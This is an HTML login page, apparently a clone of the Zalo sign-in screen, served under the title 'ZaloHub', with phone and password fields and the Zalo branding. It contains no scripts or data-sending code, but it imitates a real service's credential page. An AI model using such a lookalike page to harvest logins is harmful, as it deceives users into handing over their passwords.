<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="stylesheet" href="/stylesheets/signin.css">
    <title>Welcome to ZaloHub</title>
</head>

<body>
    <div id="app" class="wrapper-page has-mobile">
        <div class="wrapper-page is-only-desktop">
            <div class="zLogin-layout parentDisable">
                <div class="header animated fadeIn">
                    <h1>
                        <a class="logo" style="cursor: auto;"></a>
                    </h1>
                    <h2 class="hide-on-med-and-down">Đăng nhập bằng tài khoản Zalo</h2>
                    <h2 class="hide-on-med-and-down custom_app_name">chat.zalo.me</h2>
                </div>
                <div class="body">
                    <div>
                        <div>
                            <div class="body-container animated fadeIn">
                                <div>
                                    <div class="tabs animated fadeIn">
                                        <ul>
                                            <li><a class="active" href="#">Với Số điện thoại</a></li>
                                            <li><a class="" href="#">Với Mã QR</a></li>
                                        </ul>
                                    </div>
                                    <div class="content animated fadeIn">
                                        <div>
                                            <div class="animated fadeIn" style="margin-top: 0px;">
                                                <div class="form-signin">
                                                    <div>
                                                        <div class="animated fadeIn">
                                                            <div class="line-form has-ico has-flag">
                                                                <div><i class="fa fa-mobile"></i>
                                                                    <div class="select-flag"><span class="tf">+84</span>
                                                                        <div class="dropdown-flag hidden">
                                                                            <ul>
                                                                                <li class="selected"><span src="" class="flag flag-vn" alt="Vietnam"></span><span><strong>Vietnam</strong>
                                                                                        <em>+84</em>
                                                                                    </span>
                                                                                </li>
                                                                            </ul>
                                                                        </div>
                                                                    </div>
                                                                </div><input id="input-phone" tabindex="1" type="tel" name="phone_num" autocomplete="off" placeholder="Số điện thoại" class="input">
                                                            </div>
                                                            <div class="line-form has-ico"><i class="fa fa-lock"></i><input tabindex="2" type="password" placeholder="Mật khẩu" autocomplete="off"></div>
                                                            <div class="space" id="test"></div>
                                                            <div class="textAlign-center has-2btn"><a tabindex="4" class="btn btn--m block first disabled">Đăng nhập
                                                                    với
                                                                    mật khẩu</a>
                                                                <div class="btn-wrap-more"><a class="btn btn-default btn-rq btn--m disabled" href="#!">Gửi yêu cầu đăng nhập</a><span class="data-tooltip custom_tooltip">Đăng nhập
                                                                        không
                                                                        dùng mật khẩu</span>
                                                                    <div class="login-or"><a href="#" style="margin: 0px auto; overflow: hidden; white-space: nowrap;">Quên
                                                                            mật khẩu?</a></div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div>
                                <p class="action-more">Bạn chưa có tài khoản? <a>Đăng ký ngay!</a></p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="footer">
                    <p class="select-lang"><a class="lang" href="javascript:void(0)" style="font-weight: bold;">Tiếng
                            Việt</a><a class="lang" href="javascript:void(0)">English</a></p>
                    <p>Dùng tài khoản Zalo để truy cập các ứng dụng của ZA</p>
                    <div class="logos">
                        <ul>
                            <li><a href="http://zalo.me" target="_blank" class="logo-zalo"><i
                                        class="logo-zalo">Zalo</i></a>
                            </li>
                            <li><a href="http://mp3.zing.vn" target="_blank" class="logo-zingmp3"><i
                                        class="logo-zingmp3">ZingMp3</i></a></li>
                            <li><a href="http://tv.zing.vn" target="_blank" class="logo-zingtv"><i
                                        class="logo-zingtv">ZingTV</i></a></li>
                            <li><a href="http://zing.vn" target="_blank" class="logo-zing"><i
                                        class="logo-zing">Zing</i></a>
                            </li>
                            <li><a href="http://baomoi.com" target="_blank" class="logo-baomoi"><i
                                        class="logo-baomoi">Baomoi</i></a></li>
                        </ul>
                    </div>
                </div>
                <div id="logTest"></div>
            </div>
            <div id="test1"></div>
        </div>
    </div>
</body>

</html>